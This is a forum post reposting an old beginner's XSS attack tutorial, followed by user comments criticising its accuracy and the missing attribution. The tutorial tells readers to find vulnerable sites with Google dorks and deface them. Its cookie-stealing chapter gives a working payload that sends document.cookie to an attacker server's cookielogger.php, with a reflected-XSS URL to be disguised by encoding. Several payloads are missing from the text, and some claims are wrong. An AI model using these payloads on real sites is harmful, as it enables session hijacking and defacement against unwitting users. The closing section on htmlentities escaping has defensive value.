Welcome to HBH V2 ! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

XSS The Complete Walkthrough

XSS The Complete Walkthrough

By shadowls avatarshadowls | 19915 Reads |
0     0

–==+================================================================================+==– –==+ XSS The Complete Walkthrough [Chapter 1 - What is XSS?] +==– –==+================================================================================+==–

‘XSS’ also known as ‘CSS’ (Cross Site Scripting, Easily confused with ‘Cascading Style Sheets’) is a very common vulnerbility found in Web Applications, ‘XSS’ allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used.

The First Attack i wana talk about is ‘URL XSS’ this means that the XSS wont stay on the page it will only get executed if you have the malicous code in the URL and submit the url we will talk more on how to use this in our advantage.

The Second Attack is input fields, Where ever you can insert data, it is very common, to be XSS vulnerable, for example say we found a site with a search engine, Now in the search box you enter ‘hacker’ now hit enter, when the page loads, if it says your data like ‘Found 100 Results For hacker’ ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method, Also wont stay on the server, this is for your eyes only.

The Third Attack, with this attack you will be able to INSERT data (code) and it will stay on the website. now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles Forums, just most places where you insert data and it stays there. now HTML is totally diffrent then PHP HTML downloads to your pc and then your ‘Browser’ parses/interprets the code, (thats why its source is viewable) With PHP the code is interpretued on the server the script is hosted on, then the data is returned to the browser. for PHP injection its rare, But it dont harm to try. Note: PHP code cant be injected into HTML page!

–==+================================================================================+==– –==+ XSS The Complete Walkthrough [Chapter 2 - Finding XSS Vulnerbilitys] +==– –==+================================================================================+==–

Well to start finding these vulnerbilitys you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s, there are too many to mention.

Using ‘Google Dorks’ to make the finding easyier, Ok if you wana get cracking, goto google.com and type inurl:“search.php?q=” now that is a common page and has alot of results, to find out some attacks move onto the next chapter.

Also note that most sites have XSS vulnerbilitys, its just having a good eye, and some good knowledge on how to bypass there filteration.

–==+================================================================================+==– –==+ XSS The Complete Walkthrough [Chapter 3 - The Basics On XSS] +==– –==+================================================================================+==–

Well now to crack on, and start learning some Actual Methods, the most common used XSS injection is

now this will alert a popup message, saying “XSS” without quotes, its easily editable.

So backtracking on the last chapter im assuming you remember we talked about, search.php?q= well you can simple try the following on a website with the same thing,


there are good chances of it working, but dont be worried if it dont, just try diffrent sites.

some other easy XSS (i dont think people realise they can insert HTML not just javascript)


if you see the bold text on the page and newlines then you knows its vuln, then can move on using some methods explained later on in the tutorial.

–==+================================================================================+==– –==+ XSS The Complete Walkthrough [Chapter 4 - Deface Methods] +==– –==+================================================================================+==–

Well now you understand how XSS works, we can explain some simple XSS deface methods, there are many ways for defacing i will mention some of the best and most used,

the first one being IMG SCR, now for those of you who dont know html, IMG SCR is a tag, that displays the IMAGE linked to it on the webpage.

ok now if u change the link to a valid picture link, and save it and run it you will see what i mean.

Right now say you have found a Shoutbox, Comment box, or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.

the other tags are not needed has the page will already have them. (rare cases they will not)

Ok it helps to make your picture big so it stands out and its clear the site got hacked.

Another method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC=“http://site.com/xss.swf”

that will execute the flash video linked to it.

Or maybe using a pop or redirection?

There are many others ways that im not going to explain due to how busy i am, Its easy to lookup methods using google and googleing for HTML tutorials, u can see how to embed Music ect.

–==+================================================================================+==– –==+ XSS The Complete Walkthrough [Chapter 5 - Cookie Stealing] +==– –==+================================================================================+==–

I decided to add this has its the most USEFULL method of XSS, and i havent seen any papers, covering it.

first grab the cookie logger from here: http://G0t-Root.net/tools/cookie.php

ok now you have it save it has a .php file and upload to your server, remember to create the file ‘log.txt’ too and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

ok now your gona want to insert this code.

window.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie


document.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie

now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen the second one is more stealth.

Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site hasnt got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie

im not gona explain hexing it ect as it is pretty stright forward.

–==+================================================================================+==– –==+ XSS The Complete Walkthrough [Chapter 6 - Filteration Bypassing] +==– –==+================================================================================+==–

Alot of sites may seem vulnerable but not executing the code, well to solve this take note of this chapter.

Some common methods to bypass filteration is




that will do the same thing has alert(“XSS”) on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit,

Please note its bad practice to use alert(“XSS”) to test for XSS, has ive known sites block the keyword XSS before.

Some other ways to bypass filteration

Read the next chapter for another way to bypass magic quotes filteration.

–==+================================================================================+==– –==+ XSS The Complete Walkthrough [Chapter 6 - Advanced XSS] +==– –==+================================================================================+==–

Ok in this chapter were going to learn about some good techniqes, that i myself havent seen being used before, but im sure you guys will like it.

ive came across many sites where ‘Magic Quotes’ is on and therfore rendering some commands useless.

fear not, ive come up with a way using char codes (Decimals), to convert char code to Ascii.

The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here http://www.asciitable.com/

this will help you write what you want, In my examples ill be writing “t0pP8uZz” this is the following code

116 48 112 80 56 117 90 122

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.


is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)

Ok now “String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)” Is a JAVA (ASCII) way of saying


and to use this with alerts ect, you dont need to use quotes, as it acts as a variable.

Ok now this will display or message in this case “t0pP8uZz”, this method is very usefull for bypassing magic quotes and maybe some custom escaping of quotes.

Ok before i move on i wana talk about another method useing variables. lets declare one below

var myVar = 1

ok now myVar is a longer way of saying 1.

To use variables to our advantage in XSS, we could do the following

and this will display the variable contents again without using quotes.

There are many others methods, that im not going to talk about, XSS is a simple Attack. and from here you should know what you need.

–==+================================================================================+==– –==+ XSS The Complete Walkthrough [Chapter 7 - Securing XSS] +==– –==+================================================================================+==–

Ok this was written for WebDevelopers (yeah right..) so im gona talk about how to secure your code.

if you found XSS bugs in your scripts, its easy to secure, take a look at the below code

if(isset($_POST[‘form’])){echo “” .$_POST[‘form’]. “”;}

Ok say the variable $_POST[‘from’] was coming from a input box, then you have a XSS attack. the following is a very easy way to secure that.

$charset=‘UTF-8’; $data = htmlentities ($_POST[‘form’], ENT_NOQUOTES, $charset); if(isset($data)){echo “” .$data. “”;}

now that will take all possible code and make it not executable. by turning it into stuff like < ect…

You will not notice a diffrence when using htmlentries();

there are also another common function, striptags(), find more info at php.net/striptags

ok another way to show you how to secure INTEGER variables. (variables that will always contain a INT)

$this = $_GET[‘id’]; echo “you are viewing “ . $this . “blog”;

now if we include ?id=alert(“XSS”) into the url its gona execute our code, a very easy way to secure this is using (int) check the following code

$this = (int)$_GET[‘id’]; echo “you are viewing “ . $this . “blog”;

now if at anytime the varible contains anything but a Integer, it will return 0.

Thats enough said.

–==+================================================================================+==– –==+ XSS The Complete Walkthrough [The End] +==– –==+================================================================================+==–

ps. this is not my article. just to help you out out some basic xss

article from milworm.com main auther: t0pP8uZz

ghost's avatar
ghost 15 years ago

It's a pretty good walkthrough, most definately not complete. Off the top of my head, how about inline javascript injections and pure hexadecimal encoding?

Although, now that i see the part i missed at the way bottom, who actually wrote the article?

korg's avatar
korg 15 years ago

I remember this on: http://www.milw0rm.com/papers/173. Lot's of good stuff there.

korg's avatar
korg 15 years ago

^^^^ I Ment on milw0rm ^^^^. Not this article BTW.

ghost's avatar
ghost 15 years ago

its good for total beginners, shud probably give creds tho

spyware's avatar
spyware 15 years ago

Meh, join sla.ckers.org or something. You covered the easy basics.

ghost's avatar
ghost 15 years ago

no offense, but i think this is a crap article. i wouldnt have let it through. too many things missing or skimmed past.

ghost's avatar
ghost 15 years ago

Not trying to be rude or anything, but why re invent the wheel? There are a lot of holes in this article. And I agree with every one else, you are just covering the basics…

shadowls's avatar
shadowls 15 years ago

As i said in the bottom, i did not write this article. This article helped me a lot to learn the basic of xss and stuff. i also put the main auther at the end of the page.

ghost's avatar
ghost 15 years ago

richohealey's avatar
richohealey 15 years ago

Meh, there are things that are incomplete, and things that are flat out wrong. Did you get teh author's permission? God help you if i find my articles about without permission / credit.

ghost's avatar
ghost 15 years ago

'XSS' also known as 'CSS' Q? Since when and in what country? XSS is completely different than CSS, not a.k.a. (constructive criticism :P)

shadowls's avatar
shadowls 15 years ago

This is the best article by far :)

ghost's avatar
ghost 15 years ago

You're an idiot… you gave your own rip praise? The article was decent for basics, but I hate the whole "Google Dork then deface" mentality. Guess none of that matters, though, since you didn't actually WRITE the article. Good job… probably rated yourself awesome, too, didn't you? What a douche. :angry:

ghost's avatar
ghost 15 years ago

I agree with about everyoen else above me… it's not that great, you missed a few things, got a few items mixed up, and, of course, just took an article from someone else and posted it here. Write your own stuff!

Poor (tho not as poor as the '10 reasons to get Vista' article!)

ghost's avatar
ghost 15 years ago

can anybody tell me why the cookie link in chapter 5 isn't working (404)? BTW i do respect the person who wrote this article and the person who brought it here,it's no good to criticize anybody for doing anything useful…

ghost's avatar
ghost 15 years ago

Very good article i finally learn about xss

Uber0n's avatar
Uber0n 14 years ago

Damn, was this even written by someone who knows HTML? Both the 'URL XSS' as well as the 'input field XSS' are actually called Non-Persistent XSS, with the difference that the url ones use GET and the others use POST (note however that a GET XSS in an iframe wouldn't show up in the URL you see in the browser…) Also stuff like 'i dont think people realise they can insert HTML not just javascript' makes this article look extremely stupid ^^

ghost's avatar
ghost 14 years ago


shadowls's avatar
shadowls 14 years ago


hawkster's avatar
hawkster 14 years ago

^ XSS fail

The colon : function method only works in the Address Bar, and even then it's the format "javascript:alert('test')"